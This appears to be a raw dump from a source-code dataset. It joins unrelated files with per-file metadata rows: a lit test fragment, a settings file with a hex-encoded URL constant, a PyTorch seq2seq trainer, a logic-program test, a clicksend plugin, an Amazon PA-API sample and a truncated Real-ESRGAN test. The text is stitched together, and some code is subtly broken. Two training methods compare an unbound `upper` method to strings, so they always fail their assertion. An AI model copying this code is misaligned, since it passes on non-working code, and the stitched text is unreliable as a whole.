# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": null,
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "micro_value0": 4,
# CHECK-NEXT: "micro_value1": 1.3
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini:test{{[0-2]}}",
# CHECK-NEXT: "output": ""
# CHECK-NEXT: },
# CHECK-NEXT: {
# CHECK-NEXT: "code": "PASS",
# CHECK-NEXT: "elapsed": {{[0-9.]+}},
# CHECK-NEXT: "metrics": {
# CHECK-NEXT: "value0": 1,
# CHECK-NEXT: "value1": 2.3456
# CHECK-NEXT: },
# CHECK-NEXT: "name": "test-data-micro :: micro-tests.ini",
# CHECK-NEXT: "output": "Test passed."
# CHECK-NEXT: }
# CHECK-NEXT: ]
# CHECK-NEXT: }
| 31.25
| 77
| 0.543385
| 206
| 1,625
| 4.237864
| 0.174757
| 0.443299
| 0.208477
| 0.268041
| 0.791523
| 0.762887
| 0.731959
| 0.731959
| 0.731959
| 0.731959
| 0
| 0.025237
| 0.219692
| 1,625
| 51
| 78
| 31.862745
| 0.663249
| 0.937846
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
43a10915fae45a0c83b8e8c1f94f59417abb696a
| 75
|
py
|
Python
|
app/settings.py
|
Annihilator708/ORMit
|
83602ac16322168cb81c072d228abd82cc27f1c2
|
[
"MIT"
] | null | null | null |
app/settings.py
|
Annihilator708/ORMit
|
83602ac16322168cb81c072d228abd82cc27f1c2
|
[
"MIT"
] | null | null | null |
app/settings.py
|
Annihilator708/ORMit
|
83602ac16322168cb81c072d228abd82cc27f1c2
|
[
"MIT"
] | null | null | null |
VAPI = b'7777772e636f6465776172732e6e6c2f76657273696f6e64617461l302e312e30'
| 75
| 75
| 0.933333
| 3
| 75
| 23.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.739726
| 0.026667
| 75
| 1
| 75
| 75
| 0.219178
| 0
| 0
| 0
| 0
| 0
| 0.855263
| 0.855263
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
43d2a1f869e22dac7b3a9e88186f84a24471d47a
| 14,005
|
py
|
Python
|
src/python/torch/seq2seq_train.py
|
FAIR-UMN/fair_ecal_monitoring
|
bbbf55451111162c419d414c50367d153a544754
|
[
"MIT"
] | null | null | null |
src/python/torch/seq2seq_train.py
|
FAIR-UMN/fair_ecal_monitoring
|
bbbf55451111162c419d414c50367d153a544754
|
[
"MIT"
] | null | null | null |
src/python/torch/seq2seq_train.py
|
FAIR-UMN/fair_ecal_monitoring
|
bbbf55451111162c419d414c50367d153a544754
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
from torch import optim
import numpy as np
import random
from util import *
class Seq2Seq_Train:
def __init__(self,
encoder,
decoder,
input_tensor,
target_tensor,
n_epochs,
target_len,
batch_size,
learning_rate=0.01,
opt_alg='adam',
print_step=1,
strategy = 'recursive',
teacher_forcing_ratio=0.5,
device='cpu',
loss_figure_name='loss.png'):
self.encoder = encoder
self.decoder = decoder
self.input_tensor = input_tensor
self.target_tensor = target_tensor
self.n_epochs = n_epochs
self.target_len = target_len
self.batch_size = batch_size
self.learning_rate = learning_rate
self.opt_alg = opt_alg
self.print_step = print_step
self.strategy = strategy
self.teacher_forcing_ratio = teacher_forcing_ratio
self.device = device
self.loss_figure_name = loss_figure_name
def start_train(self):
print('>>> Start training... (be patient: training time varies)')
if self.strategy == 'recursive':
self.train_model_recursive()
elif self.strategy == 'teacher_forcing':
self.train_model_teacher_forcing()
elif self.strategy == 'mixed':
self.train_model_mixed()
else:
assert False, "Please select one of them---[recursive, teacher_forcing, mixed]!"
print('>>> Finish training!')
def train_model_recursive(self):
### move to device
self.encoder.to(self.device)
self.decoder.to(self.device)
### get the learnable parameters
params = []
params += [x for x in self.encoder.parameters()]
params += [x for x in self.decoder.parameters()]
### define optimizer method
if self.opt_alg.upper() == 'ADAM':
optimizer = optim.Adam(params=params, lr=self.learning_rate)
elif self.opt_alg.upper() == 'SGD':
optimizer = optim.SGD(params=params, lr=self.learning_rate)
else:
assert False, 'This version only supports ADAM and SGD!'
### define loss function
criterion = nn.MSELoss()
### calculate number of batch iterations
n_batches = int(self.input_tensor.shape[1] / self.batch_size)
### save loss
losses = []
for epoch in range(self.n_epochs):
self.encoder.train()
self.decoder.train()
batch_loss = []
for batch in range(n_batches):
# select data
input_batch = self.input_tensor[:, batch: batch + self.batch_size, :]
# target_batch_input means the "luminosity delta", which is given to us
# we will combine this information with "calibration" as input to decoder each time
target_batch_input = self.target_tensor[:, batch: batch + self.batch_size, 0:1]
# target_batch means the "calibration", which is the value we want to predict
# so target_batch is the real target
target_batch = self.target_tensor[:, batch: batch + self.batch_size, 1:]
# move data to device
input_batch = input_batch.to(self.device)
target_batch = target_batch.to(self.device)
target_batch_input = target_batch_input.to(self.device)
# outputs tensor
outputs = torch.zeros(self.target_len, self.batch_size, target_batch.shape[2])
# initialize hidden state
# encoder_hidden = self.encoder.init_hidden(batch_size)
# zero the gradient
optimizer.zero_grad()
# encoder outputs
encoder_output, encoder_hidden = self.encoder(input_batch)
# decoder with teacher forcing
decoder_input = input_batch[-1, :, :] # shape: (batch_size, input_size)
decoder_hidden = encoder_hidden
# different training strategies
# predict recursively
# make prediction step by step
for t in range(self.target_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
outputs[t] = decoder_output
### adding the other features
lumi_feature = target_batch_input[t, :, :]
decoder_output = torch.cat((lumi_feature, decoder_output), dim=1)
decoder_input = decoder_output
# compute the loss
outputs = outputs.to(self.device)
loss = criterion(outputs, target_batch)
batch_loss.append(loss.item())
# backpropagation
loss.backward()
optimizer.step()
epoch_loss = np.mean(batch_loss)
#print('>>>>>> {}/{} Epoch; Loss={}'.format(epoch, self.n_epochs, epoch_loss))
losses.append(epoch_loss)
### we save its loss every print_step
if epoch % self.print_step == 0:
plot_loss(losses, self.loss_figure_name)
show_loss(losses)
def train_model_teacher_forcing(self):
### move to device
self.encoder.to(self.device)
self.decoder.to(self.device)
### get the learnable parameters
params = []
params += [x for x in self.encoder.parameters()]
params += [x for x in self.decoder.parameters()]
### define optimizer method
if self.opt_alg.upper == 'ADAM':
optimizer = optim.Adam(params=params, lr=self.learning_rate)
if self.opt_alg.upper == 'SGD':
optimizer = optim.SGD(params=params, lr=self.learning_rate)
else:
assert False, 'This version only supports ADAM and SGD!'
### define loss function
criterion = nn.MSELoss()
### calculate number of batch iterations
n_batches = int(self.input_tensor.shape[1] / self.batch_size)
### save loss
losses = []
for epoch in range(self.n_epochs):
self.encoder.train()
self.decoder.train()
batch_loss = []
for batch in range(n_batches):
# select data
input_batch = self.input_tensor[:, batch: batch + self.batch_size, :]
# target_batch_input means the "luminosity delta", which is given to us
# we will combine this information with "calibration" as input to decoder each time
target_batch_input = self.target_tensor[:, batch: batch + self.batch_size, 0:1]
# target_batch means the "calibration", which is the value we want to predict
# so target_batch is the real target
target_batch = self.target_tensor[:, batch: batch + self.batch_size, 1:]
# move data to device
input_batch = input_batch.to(self.device)
target_batch = target_batch.to(self.device)
target_batch_input = target_batch_input.to(self.device)
# outputs tensor
outputs = torch.zeros(self.target_len, self.batch_size, target_batch.shape[2])
# initialize hidden state
# encoder_hidden = self.encoder.init_hidden(batch_size)
# zero the gradient
optimizer.zero_grad()
# encoder outputs
encoder_output, encoder_hidden = self.encoder(input_batch)
# decoder with teacher forcing
decoder_input = input_batch[-1, :, :] # shape: (batch_size, input_size)
decoder_hidden = encoder_hidden
# different training strategies
# use teacher forcing
if random.random() < self.teacher_forcing_ratio:
for t in range(self.target_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
outputs[t] = decoder_output
decoder_input = target_batch[t, :, :]
### adding the other features
lumi_feature = target_batch_input[t, :, :]
decoder_input = torch.cat((lumi_feature, decoder_input), dim=1)
# predict recursively
else:
for t in range(self.target_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
outputs[t] = decoder_output
### adding the other features
lumi_feature = target_batch_input[t, :, :]
decoder_output = torch.cat((lumi_feature, decoder_output), dim=1)
decoder_input = decoder_output
# compute the loss
outputs = outputs.to(self.device)
loss = criterion(outputs, target_batch)
batch_loss.append(loss.item())
# backpropagation
loss.backward()
optimizer.step()
epoch_loss = np.mean(batch_loss)
#print('>>>>>> {}/{} Epoch; Loss={}'.format(epoch, self.n_epochs, epoch_loss))
losses.append(epoch_loss)
### we save its loss every print_step
if epoch % self.print_step == 0:
plot_loss(losses, self.loss_figure_name)
show_loss(losses)
def train_model_mixed(self):
### move to device
self.encoder.to(self.device)
self.decoder.to(self.device)
### get the learnable parameters
params = []
params += [x for x in self.encoder.parameters()]
params += [x for x in self.decoder.parameters()]
### define optimizer method
if self.opt_alg.upper == 'ADAM':
optimizer = optim.Adam(params=params, lr=self.learning_rate)
if self.opt_alg.upper == 'SGD':
optimizer = optim.SGD(params=params, lr=self.learning_rate)
else:
assert False, 'This version only supports ADAM and SGD!'
### define loss function
criterion = nn.MSELoss()
### calculate number of batch iterations
n_batches = int(self.input_tensor.shape[1] / self.batch_size)
### save loss
losses = []
for epoch in range(self.n_epochs):
self.encoder.train()
self.decoder.train()
batch_loss = []
for batch in range(n_batches):
# select data
input_batch = self.input_tensor[:, batch: batch + self.batch_size, :]
# target_batch_input means the "luminosity delta", which is given to us
# we will combine this information with "calibration" as input to decoder each time
target_batch_input = self.target_tensor[:, batch: batch + self.batch_size, 0:1]
# target_batch means the "calibration", which is the value we want to predict
# so target_batch is the real target
target_batch = self.target_tensor[:, batch: batch + self.batch_size, 1:]
# move data to device
input_batch = input_batch.to(self.device)
target_batch = target_batch.to(self.device)
target_batch_input = target_batch_input.to(self.device)
# outputs tensor
outputs = torch.zeros(self.target_len, self.batch_size, target_batch.shape[2])
# initialize hidden state
# encoder_hidden = self.encoder.init_hidden(batch_size)
# zero the gradient
optimizer.zero_grad()
# encoder outputs
encoder_output, encoder_hidden = self.encoder(input_batch)
# decoder with teacher forcing
decoder_input = input_batch[-1, :, :] # shape: (batch_size, input_size)
decoder_hidden = encoder_hidden
# different training strategies
# predict using mixed teacher forcing
for t in range(self.target_len):
decoder_output, decoder_hidden = self.decoder(decoder_input, decoder_hidden)
outputs[t] = decoder_output
# predict with teacher forcing
if random.random() < self.teacher_forcing_ratio:
decoder_input = target_batch[t, :, :]
### adding the other features
lumi_feature = target_batch_input[t, :, :]
decoder_input = torch.cat((lumi_feature, decoder_input), dim=1)
# predict recursively
else:
### adding the other features
lumi_feature = target_batch_input[t, :, :]
decoder_output = torch.cat((lumi_feature, decoder_output), dim=1)
decoder_input = decoder_output
# compute the loss
outputs = outputs.to(self.device)
loss = criterion(outputs, target_batch)
batch_loss.append(loss.item())
# backpropagation
loss.backward()
optimizer.step()
epoch_loss = np.mean(batch_loss)
#print('>>>>>> {}/{} Epoch; Loss={}'.format(epoch, self.n_epochs, epoch_loss))
losses.append(epoch_loss)
### we save its loss every print_step
if epoch % self.print_step == 0:
plot_loss(losses, self.loss_figure_name)
show_loss(losses)
| 39.786932
| 100
| 0.558586
| 1,522
| 14,005
| 4.936925
| 0.103811
| 0.058557
| 0.028746
| 0.023955
| 0.867581
| 0.864653
| 0.864653
| 0.864653
| 0.864653
| 0.851078
| 0
| 0.003655
| 0.355302
| 14,005
| 352
| 101
| 39.786932
| 0.828552
| 0.191503
| 0
| 0.746269
| 0
| 0
| 0.029856
| 0
| 0
| 0
| 0
| 0
| 0.019901
| 1
| 0.024876
| false
| 0
| 0.029851
| 0
| 0.059701
| 0.034826
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
605fcce62e2c61d1583551fb992c3db61567260f
| 213
|
py
|
Python
|
tests/parser/wellfounded.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/wellfounded.5.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
win( X ) :- move( X, Y ), not win( Y ).
move( a, d ).
move( b, c ).
move( c, b ).
"""
output = """
win( X ) :- move( X, Y ), not win( Y ).
move( a, d ).
move( b, c ).
move( c, b ).
"""
| 12.529412
| 40
| 0.380282
| 36
| 213
| 2.25
| 0.305556
| 0.098765
| 0.197531
| 0.222222
| 0.864198
| 0.864198
| 0.864198
| 0.864198
| 0.864198
| 0.864198
| 0
| 0
| 0.338028
| 213
| 16
| 41
| 13.3125
| 0.574468
| 0
| 0
| 0.833333
| 0
| 0
| 0.845771
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
607628f8ea875bbe76185742f08de5fd781c848b
| 1,315
|
py
|
Python
|
clicksend.py
|
z1pti3/jimiPlugin-clicksend
|
f635aac09c2e12d6456fa1ceea1f4b88199c4e29
|
[
"Apache-2.0"
] | 1
|
2021-07-26T15:02:38.000Z
|
2021-07-26T15:02:38.000Z
|
clicksend.py
|
z1pti3/jimiPlugin-clicksend
|
f635aac09c2e12d6456fa1ceea1f4b88199c4e29
|
[
"Apache-2.0"
] | null | null | null |
clicksend.py
|
z1pti3/jimiPlugin-clicksend
|
f635aac09c2e12d6456fa1ceea1f4b88199c4e29
|
[
"Apache-2.0"
] | null | null | null |
import jimi
class _clicksend(jimi.plugin._plugin):
version = 0.1
def install(self):
# Register models
jimi.model.registerModel("clicksendSMS","_clicksendSMS","_action","plugins.clicksend.models.action")
jimi.model.registerModel("clicksendPullUnreadSMS","_clicksendPullUnreadSMS","_action","plugins.clicksend.models.action")
jimi.model.registerModel("clicksendGetAccountUsage","_clicksendGetAccountUsage","_action","plugins.clicksend.models.action")
jimi.model.registerModel("clicksendGetAccountInfo","_clicksendGetAccountInfo","_action","plugins.clicksend.models.action")
return True
def uninstall(self):
# deregister models
jimi.model.deregisterModel("clicksendSMS","_clicksendSMS","_action","plugins.clicksend.models.action")
jimi.model.deregisterModel("clicksendPullUnreadSMS","_clicksendPullUnreadSMS","_action","plugins.clicksend.models.action")
jimi.model.deregisterModel("clicksendGetAccountUsage","_clicksendGetAccountUsage","_action","plugins.clicksend.models.action")
jimi.model.deregisterModel("clicksendGetAccountInfo","_clicksendGetAccountInfo","_action","plugins.clicksend.models.action")
return True
def upgrade(self,LatestPluginVersion):
pass
#if self.version < 0.2:
| 52.6
| 134
| 0.744487
| 114
| 1,315
| 8.429825
| 0.27193
| 0.074922
| 0.183143
| 0.233091
| 0.790843
| 0.790843
| 0.790843
| 0.790843
| 0.703434
| 0.193548
| 0
| 0.003487
| 0.127757
| 1,315
| 24
| 135
| 54.791667
| 0.83435
| 0.041825
| 0
| 0.117647
| 0
| 0
| 0.506369
| 0.421975
| 0
| 0
| 0
| 0
| 0
| 1
| 0.176471
| false
| 0.058824
| 0.058824
| 0
| 0.470588
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
608cc7c119405bc22f92b4a94114011c611d50ed
| 13,886
|
py
|
Python
|
sample_search_items_api.py
|
Peekaboo0/paapi5-python
|
a591a63b2e48bbdf50e569031a63ffd6e29da9bd
|
[
"Apache-2.0"
] | null | null | null |
sample_search_items_api.py
|
Peekaboo0/paapi5-python
|
a591a63b2e48bbdf50e569031a63ffd6e29da9bd
|
[
"Apache-2.0"
] | null | null | null |
sample_search_items_api.py
|
Peekaboo0/paapi5-python
|
a591a63b2e48bbdf50e569031a63ffd6e29da9bd
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License").
You may not use this file except in compliance with the License.
A copy of the License is located at
http://www.apache.org/licenses/LICENSE-2.0
or in the "license" file accompanying this file. This file is distributed
on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
express or implied. See the License for the specific language governing
permissions and limitations under the License.
"""
"""
ProductAdvertisingAPI
https://webservices.amazon.com/paapi5/documentation/index.html
"""
"""
This sample code snippet is for ProductAdvertisingAPI 5.0's SearchItems API
For more details, refer:
https://webservices.amazon.com/paapi5/documentation/search-items.html
"""
from paapi5_python_sdk.api.default_api import DefaultApi
from paapi5_python_sdk.models.partner_type import PartnerType
from paapi5_python_sdk.models.search_items_request import SearchItemsRequest
from paapi5_python_sdk.models.search_items_resource import SearchItemsResource
from paapi5_python_sdk.rest import ApiException
def search_items():
""" Following are your credentials """
""" Please add your access key here """
access_key = "<YOUR ACCESS KEY>"
""" Please add your secret key here """
secret_key = "<YOUR SECRET KEY>"
""" Please add your partner tag (store/tracking id) here """
partner_tag = "<YOUR PARTNER TAG>"
""" PAAPI host and region to which you want to send request """
""" For more details refer: https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region"""
host = "webservices.amazon.com"
region = "us-east-1"
""" API declaration """
default_api = DefaultApi(
access_key=access_key, secret_key=secret_key, host=host, region=region
)
""" Request initialization"""
""" Specify keywords """
keywords = "Harry Potter"
""" Specify the category in which search request is to be made """
""" For more details, refer: https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html """
search_index = "All"
""" Specify item count to be returned in search result """
item_count = 1
""" Choose resources you want from SearchItemsResource enum """
""" For more details, refer: https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter """
search_items_resource = [
SearchItemsResource.ITEMINFO_TITLE,
SearchItemsResource.OFFERS_LISTINGS_PRICE,
]
""" Forming request """
try:
search_items_request = SearchItemsRequest(
partner_tag=partner_tag,
partner_type=PartnerType.ASSOCIATES,
keywords=keywords,
search_index=search_index,
item_count=item_count,
resources=search_items_resource,
)
except ValueError as exception:
print("Error in forming SearchItemsRequest: ", exception)
return
try:
""" Sending request """
response = default_api.search_items(search_items_request)
print("API called Successfully")
print("Complete Response:", response)
""" Parse response """
if response.search_result is not None:
print("Printing first item information in SearchResult:")
item_0 = response.search_result.items[0]
if item_0 is not None:
if item_0.asin is not None:
print("ASIN: ", item_0.asin)
if item_0.detail_page_url is not None:
print("DetailPageURL: ", item_0.detail_page_url)
if (
item_0.item_info is not None
and item_0.item_info.title is not None
and item_0.item_info.title.display_value is not None
):
print("Title: ", item_0.item_info.title.display_value)
if (
item_0.offers is not None
and item_0.offers.listings is not None
and item_0.offers.listings[0].price is not None
and item_0.offers.listings[0].price.display_amount is not None
):
print(
"Buying Price: ", item_0.offers.listings[0].price.display_amount
)
if response.errors is not None:
print("\nPrinting Errors:\nPrinting First Error Object from list of Errors")
print("Error code", response.errors[0].code)
print("Error message", response.errors[0].message)
except ApiException as exception:
print("Error calling PA-API 5.0!")
print("Status code:", exception.status)
print("Errors :", exception.body)
print("Request ID:", exception.headers["x-amzn-RequestId"])
except TypeError as exception:
print("TypeError :", exception)
except ValueError as exception:
print("ValueError :", exception)
except Exception as exception:
print("Exception :", exception)
def search_items_with_http_info():
""" Following are your credentials """
""" Please add your access key here """
access_key = "<YOUR ACCESS KEY>"
""" Please add your secret key here """
secret_key = "<YOUR SECRET KEY>"
""" Please add your partner tag (store/tracking id) here """
partner_tag = "<YOUR PARTNER TAG>"
""" PAAPI host and region to which you want to send request """
""" For more details refer: https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region"""
host = "webservices.amazon.com"
region = "us-east-1"
""" API declaration """
default_api = DefaultApi(
access_key=access_key, secret_key=secret_key, host=host, region=region
)
""" Request initialization"""
""" Specify keywords """
keywords = "Harry Potter"
""" Specify the category in which search request is to be made """
""" For more details, refer: https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html """
search_index = "All"
""" Specify item count to be returned in search result """
item_count = 1
""" Choose resources you want from SearchItemsResource enum """
""" For more details, refer: https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter """
search_items_resource = [
SearchItemsResource.ITEMINFO_TITLE,
SearchItemsResource.OFFERS_LISTINGS_PRICE,
]
""" Forming request """
try:
search_items_request = SearchItemsRequest(
partner_tag=partner_tag,
partner_type=PartnerType.ASSOCIATES,
keywords=keywords,
search_index=search_index,
item_count=item_count,
resources=search_items_resource,
)
except ValueError as exception:
print("Error in forming SearchItemsRequest: ", exception)
return
try:
""" Sending request """
response_with_http_info = default_api.search_items_with_http_info(
search_items_request
)
""" Parse response """
if response_with_http_info is not None:
print("API called Successfully")
print("Complete Response Dump:", response_with_http_info)
print("HTTP Info:", response_with_http_info[2])
response = response_with_http_info[0]
if response.search_result is not None:
print("Printing first item information in SearchResult:")
item_0 = response.search_result.items[0]
if item_0 is not None:
if item_0.asin is not None:
print("ASIN: ", item_0.asin)
if item_0.detail_page_url is not None:
print("DetailPageURL: ", item_0.detail_page_url)
if (
item_0.item_info is not None
and item_0.item_info.title is not None
and item_0.item_info.title.display_value is not None
):
print("Title: ", item_0.item_info.title.display_value)
if (
item_0.offers is not None
and item_0.offers.listings is not None
and item_0.offers.listings[0].price is not None
and item_0.offers.listings[0].price.display_amount is not None
):
print(
"Buying Price: ",
item_0.offers.listings[0].price.display_amount,
)
if response.errors is not None:
print(
"\nPrinting Errors:\nPrinting First Error Object from list of Errors"
)
print("Error code", response.errors[0].code)
print("Error message", response.errors[0].message)
except ApiException as exception:
print("Error calling PA-API 5.0!")
print("Status code:", exception.status)
print("Errors :", exception.body)
print("Request ID:", exception.headers["x-amzn-RequestId"])
except TypeError as exception:
print("TypeError :", exception)
except ValueError as exception:
print("ValueError :", exception)
except Exception as exception:
print("Exception :", exception)
def search_items_async():
""" Following are your credentials """
""" Please add your access key here """
access_key = "<YOUR ACCESS KEY>"
""" Please add your secret key here """
secret_key = "<YOUR SECRET KEY>"
""" Please add your partner tag (store/tracking id) here """
partner_tag = "<YOUR PARTNER TAG>"
""" PAAPI host and region to which you want to send request """
""" For more details refer: https://webservices.amazon.com/paapi5/documentation/common-request-parameters.html#host-and-region"""
host = "webservices.amazon.com"
region = "us-east-1"
""" API declaration """
default_api = DefaultApi(
access_key=access_key, secret_key=secret_key, host=host, region=region
)
""" Request initialization"""
""" Specify keywords """
keywords = "Harry Potter"
""" Specify the category in which search request is to be made """
""" For more details, refer: https://webservices.amazon.com/paapi5/documentation/use-cases/organization-of-items-on-amazon/search-index.html """
search_index = "All"
""" Specify item count to be returned in search result """
item_count = 1
""" Choose resources you want from SearchItemsResource enum """
""" For more details, refer: https://webservices.amazon.com/paapi5/documentation/search-items.html#resources-parameter """
search_items_resource = [
SearchItemsResource.ITEMINFO_TITLE,
SearchItemsResource.OFFERS_LISTINGS_PRICE,
]
""" Forming request """
try:
search_items_request = SearchItemsRequest(
partner_tag=partner_tag,
partner_type=PartnerType.ASSOCIATES,
keywords=keywords,
search_index=search_index,
item_count=item_count,
resources=search_items_resource,
)
except ValueError as exception:
print("Error in forming SearchItemsRequest: ", exception)
return
try:
""" Sending request """
thread = default_api.search_items(search_items_request, async_req=True)
response = thread.get()
print("API called Successfully")
print("Complete Response:", response)
""" Parse response """
if response.search_result is not None:
print("Printing first item information in SearchResult:")
item_0 = response.search_result.items[0]
if item_0 is not None:
if item_0.asin is not None:
print("ASIN: ", item_0.asin)
if item_0.detail_page_url is not None:
print("DetailPageURL: ", item_0.detail_page_url)
if (
item_0.item_info is not None
and item_0.item_info.title is not None
and item_0.item_info.title.display_value is not None
):
print("Title: ", item_0.item_info.title.display_value)
if (
item_0.offers is not None
and item_0.offers.listings is not None
and item_0.offers.listings[0].price is not None
and item_0.offers.listings[0].price.display_amount is not None
):
print(
"Buying Price: ", item_0.offers.listings[0].price.display_amount
)
if response.errors is not None:
print("\nPrinting Errors:\nPrinting First Error Object from list of Errors")
print("Error code", response.errors[0].code)
print("Error message", response.errors[0].message)
except ApiException as exception:
print("Error calling PA-API 5.0!")
print("Status code:", exception.status)
print("Errors :", exception.body)
print("Request ID:", exception.headers["x-amzn-RequestId"])
except TypeError as exception:
print("TypeError :", exception)
except ValueError as exception:
print("ValueError :", exception)
except Exception as exception:
print("Exception :", exception)
search_items()
# search_items_with_http_info()
# search_items_async()
| 37.227882
| 148
| 0.620913
| 1,611
| 13,886
| 5.21167
| 0.124146
| 0.026798
| 0.039662
| 0.031682
| 0.88697
| 0.882563
| 0.877323
| 0.84576
| 0.84576
| 0.84576
| 0
| 0.010448
| 0.283163
| 13,886
| 372
| 149
| 37.327957
| 0.833032
| 0.052067
| 0
| 0.844444
| 0
| 0
| 0.139168
| 0.006556
| 0
| 0
| 0
| 0
| 0
| 1
| 0.013333
| false
| 0
| 0.022222
| 0
| 0.048889
| 0.244444
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
609c7eaab2c4113d06e13fec1897cce725812b62
| 101
|
py
|
Python
|
python/shekels/core/__init__.py
|
theNewFlesh/shekels
|
dbfe308df454390c07f54158abf32ce23561c145
|
[
"MIT"
] | 1
|
2021-12-27T17:23:32.000Z
|
2021-12-27T17:23:32.000Z
|
python/shekels/core/__init__.py
|
theNewFlesh/shekels
|
dbfe308df454390c07f54158abf32ce23561c145
|
[
"MIT"
] | null | null | null |
python/shekels/core/__init__.py
|
theNewFlesh/shekels
|
dbfe308df454390c07f54158abf32ce23561c145
|
[
"MIT"
] | null | null | null |
import shekels.core.config
import shekels.core.data_tools
import shekels.core.database # noqa: F401
| 25.25
| 42
| 0.821782
| 15
| 101
| 5.466667
| 0.6
| 0.47561
| 0.621951
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.032967
| 0.09901
| 101
| 3
| 43
| 33.666667
| 0.868132
| 0.09901
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
715b4082645c131d43d728ae8f65bcc2430aa8c9
| 6,037
|
py
|
Python
|
tests/test_dataset.py
|
pcuenca/Real-ESRGAN
|
9ff1944d06e9d7fe86c68bbf1a244cff403f064e
|
[
"BSD-3-Clause"
] | 8,944
|
2021-07-22T21:11:06.000Z
|
2022-03-31T22:29:38.000Z
|
tests/test_dataset.py
|
pcuenca/Real-ESRGAN
|
9ff1944d06e9d7fe86c68bbf1a244cff403f064e
|
[
"BSD-3-Clause"
] | 239
|
2021-07-23T16:21:32.000Z
|
2022-03-31T12:44:19.000Z
|
tests/test_dataset.py
|
pcuenca/Real-ESRGAN
|
9ff1944d06e9d7fe86c68bbf1a244cff403f064e
|
[
"BSD-3-Clause"
] | 1,040
|
2021-07-23T01:10:30.000Z
|
2022-03-31T03:41:08.000Z
|
import pytest
import yaml
from realesrgan.data.realesrgan_dataset import RealESRGANDataset
from realesrgan.data.realesrgan_paired_dataset import RealESRGANPairedDataset
def test_realesrgan_dataset():
with open('tests/data/test_realesrgan_dataset.yml', mode='r') as f:
opt = yaml.load(f, Loader=yaml.FullLoader)
dataset = RealESRGANDataset(opt)
assert dataset.io_backend_opt['type'] == 'disk' # io backend
assert len(dataset) == 2 # whether to read correct meta info
assert dataset.kernel_list == [
'iso', 'aniso', 'generalized_iso', 'generalized_aniso', 'plateau_iso', 'plateau_aniso'
] # correct initialization the degradation configurations
assert dataset.betag_range2 == [0.5, 4]
# test __getitem__
result = dataset.__getitem__(0)
# check returned keys
